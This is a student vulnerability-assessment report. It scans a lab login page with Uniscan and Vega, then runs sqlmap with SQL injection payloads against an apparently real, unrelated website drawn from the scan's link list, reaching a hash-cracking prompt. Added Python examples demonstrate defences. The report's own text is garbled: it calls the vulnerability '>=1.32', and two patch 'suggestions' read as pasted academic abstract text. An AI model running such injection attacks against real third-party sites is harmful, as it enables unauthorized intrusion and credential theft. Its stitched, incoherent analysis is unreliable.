Vulnerability Analysis Report

1. The document discusses using tools like Uniscan and Vega to analyze vulnerabilities on a website login page. Uniscan found 10 internal links while Vega found issues like cross-site scripting and SQL injection. 2. SQLmap was used to grab the 'flag' by targeting the id parameter on another website found in the original URL. 3. Suggestions are provided to patch the security issues, including always setting the secure cookie flag and providing explanatory patches to make bug reports more actionable.

Verzeo Minor Project

Made by Gaurav Prasad
Q1.) Find out the vulnerability of https://lab.hackerinside.xyz/login.php ?

Ans1.) For testing the vulnerability of the given URL, I have used Uniscan. The vulnerability of https://lab.hackerinside.xyz/login.php is >=1.32.
[Screenshot: Uniscan run from a Kali terminal against https://lab.hackerinside.xyz/login.php. Legible fragments of the output, cleaned up:]

    uniscan -u https://lab.hackerinside.xyz/login.php (scan options illegible)
    # Uniscan project #
    Domain: http://https:/
    Use of uninitialized value in unpack at /usr/share/uniscan/Uniscan/Functions.pm line 62.

[The remainder of the screenshot is not legible.]
Uniscan Report:-
There are 10 inurl results present for the given URL site. They are:-
1.) http://nuelacoid.com/
2.) http://www.na.gov.pk/
3.) http://https:/
4.) http://breakthesecurity.cysecurity.org/
5.) http://www.icdcprague.org/
6.) http://ecqa.org/
7.) http://romanianwriters.ro/
8.) http://testphp.vulnweb.com/
9.) http://sneaindia.com/
10.) http://www.sneaindia.com/

Q2.) Check out the vulnerability of https://lab.hackerinside.xyz/login.php ?

Ans2.) For checking the vulnerability of the given URL, I have used the Vega tool. We can see that https://lab.hackerinside.xyz/login.php has 5 major and 1 low-level exploitation vulnerabilities.

The 5 major exploitation vulnerabilities are:-
1.) Cross Site Scripting
2.) MySQL Error Detected – Possible SQL Injection
3.) Session Cookie without HttpOnly Flag
4.) Session Cookie Without Secure Flag
5.) SQL Injection (https://lab.hackerinside.xyz/login.php )

The minor exploitation vulnerability is:-
1.) Form Password Field With Autocomplete Enabled

Request Report Response:-


Vega exploitation vulnerability report:-

Q3.) Grab the ‘flag’?

Ans3.) For grabbing the flag I have used sqlmap, and taken https://www.sneaindia.com/index.php?id=1 as it was present in the list above for https://lab.hackerinside.xyz/login.php/ .

[Screenshot: sqlmap run from a Kali terminal against https://www.sneaindia.com/index.php?id=1. Legible output, cleaned up; per-line timestamps omitted:]

    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting @ (time partly illegible) /2020-05-2?/

    testing connection to the target URL
    checking if the target is protected by some kind of WAF/IPS
    target URL content is stable
    testing if GET parameter 'id' is dynamic
    heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
    heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
    testing for SQL injection on GET parameter 'id'
    it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
    GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Select the Month and Year")

    Parameter: id (GET)
        Type: boolean-based blind
        Payload: id=1 AND 6219=6219

        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: id=1 AND (SELECT ... FROM (SELECT(SLEEP(...   (rest illegible in the screenshot)

[Second screenshot: sqlmap re-run against the same target, resuming from the stored session:]

    [!] legal disclaimer: (as above)

    resuming back-end DBMS 'mysql'
    testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    the back-end DBMS is MySQL
    do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
    do you want to crack them via a dictionary-based attack? [Y/n/q]
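Why the id parameter behaves the way sqlmap reports above (and why Vega flags "Possible SQL Injection" on the login page), and what removes the behaviour, as an added example that is not part of this report. It uses an in-memory SQLite table as a stand-in for the MySQL table behind index.php; the schema, the rows and the always-false payload are constructed, while the always-true payload is the one sqlmap printed. The same concatenation-versus-binding contrast applies to the login form's username and password fields.

```python
import sqlite3

# Constructed stand-in for the table behind index.php?id=1 (not the real schema).
ROWS = [(1, "Home"), (2, "About"), (3, "Contact")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, raw_id: str):
    """'Before' pattern: the request parameter is concatenated into the SQL text.
    Anything after the number is executed as SQL, so an attacker-controlled
    condition decides whether a row comes back. That true/false difference in
    the response is exactly what a boolean-based blind scanner measures."""
    sql = "SELECT title FROM pages WHERE id = " + raw_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_parameterized(conn: sqlite3.Connection, raw_id):
    """Fix 1: bind the value instead of splicing it into the query text.
    The whole string is compared with the id column as one value; it is never
    parsed as SQL, so 'AND 6219=6219' is just characters that match no id."""
    row = conn.execute("SELECT title FROM pages WHERE id = ?", (raw_id,)).fetchone()
    return row[0] if row else None


def is_valid_id(raw_id: str) -> bool:
    """Fix 2: an id is a positive integer, so reject everything else up front.
    Validation does not replace parameterization; it keeps bad input from
    reaching the database and gives the application a clean place to log it."""
    return raw_id.isdigit() and int(raw_id) > 0


def lookup_hardened(conn: sqlite3.Connection, raw_id: str):
    """Validate, then bind: the only thing that reaches the database is an int."""
    if not is_valid_id(raw_id):
        raise ValueError("id must be a positive integer")
    return lookup_parameterized(conn, int(raw_id))


def demo() -> dict:
    """Run all three variants against the payload shapes sqlmap used."""
    conn = make_db()
    true_payload = "1 AND 6219=6219"   # payload from the sqlmap output above
    false_payload = "1 AND 6219=6220"  # constructed: same shape, always false
    return {
        "vulnerable/true": lookup_vulnerable(conn, true_payload),        # 'Home'
        "vulnerable/false": lookup_vulnerable(conn, false_payload),      # None
        "parameterized/true": lookup_parameterized(conn, true_payload),  # None
        "parameterized/plain": lookup_parameterized(conn, "1"),          # 'Home'
        "hardened/plain": lookup_hardened(conn, "1"),                    # 'Home'
        "hardened/payload_rejected": not is_valid_id(true_payload),      # True
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:28} -> {result!r}")
```

The vulnerable variant returns a row for the true payload and nothing for the false one, which is the differential that lets a scanner confirm the injection without seeing any error. With the bound parameter both payloads return nothing, and with validation in front of it the payload never reaches the query at all. Logging rejected ids is also the cheapest detection signal for this class of probing.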

Suggestions for patching these bugs:-

1.) Whenever the cookie is created in the code, set the Secure flag to true.

2.) The patches can suggest inserting code not present in the original program. This is the first algorithm we are aware of that produces patches from bug reports. We demonstrate that our algorithm increases the usefulness of off-the-shelf bug-finding tools that find defects in large programs. We present experimental evidence to show that including such patches makes bug reports more likely to be addressed. We conclude that patches should be included in bug reports in practice.

3.) A textual patch is then created to represent the differences between the original program and the modified program. This patch may suggest the inclusion of new code that was not in the original program. The patch comes with a guarantee that applying it will not introduce any new errors along paths unrelated to the reported violation with respect to the given safety policy. The patch is used as a starting point for understanding and addressing the problem. We present experiments demonstrating that bug reports that also contain explanatory patches are more likely to be addressed in practice. In our experiments, bug reports with patches were three times as likely to be addressed. We believe that the ultimate purpose of bug-finding tools and software model checkers is to increase the quality of software by getting bugs fixed. Our patch generation algorithm works with most software bug-finding tools and serves as a generic post-processing step that makes it more likely that the bugs they find will actually be addressed. These enriched bug reports make it easier for maintainers to address defects.
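A check for suggestion 1 and for Vega findings 3 and 4 above, as an added example that is not part of this report: it parses a Set-Cookie header, names the protective flags that are missing, and rewrites the header with them set. The header values are constructed; PHPSESSID is PHP's default session cookie name. The two finding names are Vega's from the list above; the SameSite check is an extra one that the report does not list.

```python
from typing import Dict, List, Tuple, Union

# Constructed example headers: the first has the shape Vega flags,
# the second is the corrected form the audit should accept.
WEAK_HEADER = "PHPSESSID=abc123; path=/"
HARDENED_HEADER = "PHPSESSID=abc123; path=/; Secure; HttpOnly; SameSite=Lax"


def parse_set_cookie(header: str) -> Tuple[str, Dict[str, Union[str, bool]]]:
    """Split a Set-Cookie value into (cookie name, {attribute: value}).
    Attribute names are case-insensitive (RFC 6265); a flag with no value,
    such as Secure or HttpOnly, is stored as True."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name = parts[0].partition("=")[0].strip()
    attrs: Dict[str, Union[str, bool]] = {}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip() if value else True
    return name, attrs


def audit_set_cookie(header: str) -> List[str]:
    """Return the finding names that apply to this session cookie header.
    Without Secure the cookie is sent over plain HTTP; without HttpOnly it is
    readable from script, so the XSS finding above would expose the session."""
    _, attrs = parse_set_cookie(header)
    findings: List[str] = []
    if "secure" not in attrs:
        findings.append("Session Cookie Without Secure Flag")
    if "httponly" not in attrs:
        findings.append("Session Cookie without HttpOnly Flag")
    samesite = str(attrs.get("samesite", "")).lower()
    if samesite not in ("lax", "strict"):
        findings.append("Session Cookie without SameSite=Lax/Strict")
    return findings


def harden_set_cookie(header: str) -> str:
    """Append any missing flag while keeping the attributes already present."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    present = {p.partition("=")[0].strip().lower() for p in parts[1:]}
    if "secure" not in present:
        parts.append("Secure")
    if "httponly" not in present:
        parts.append("HttpOnly")
    if "samesite" not in present:
        parts.append("SameSite=Lax")
    return "; ".join(parts)


if __name__ == "__main__":
    print("weak    :", audit_set_cookie(WEAK_HEADER))
    fixed = harden_set_cookie(WEAK_HEADER)
    print("hardened:", fixed)
    print("recheck :", audit_set_cookie(fixed))
```

Running the audit against a live login page means capturing the Set-Cookie header from the login response and passing it to audit_set_cookie; an empty list is the pass condition. On the PHP side the equivalent of harden_set_cookie is configuration rather than code: session.cookie_secure, session.cookie_httponly and session.cookie_samesite in php.ini (or the same keys passed to session_set_cookie_params()) set these flags on every session cookie the application issues.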
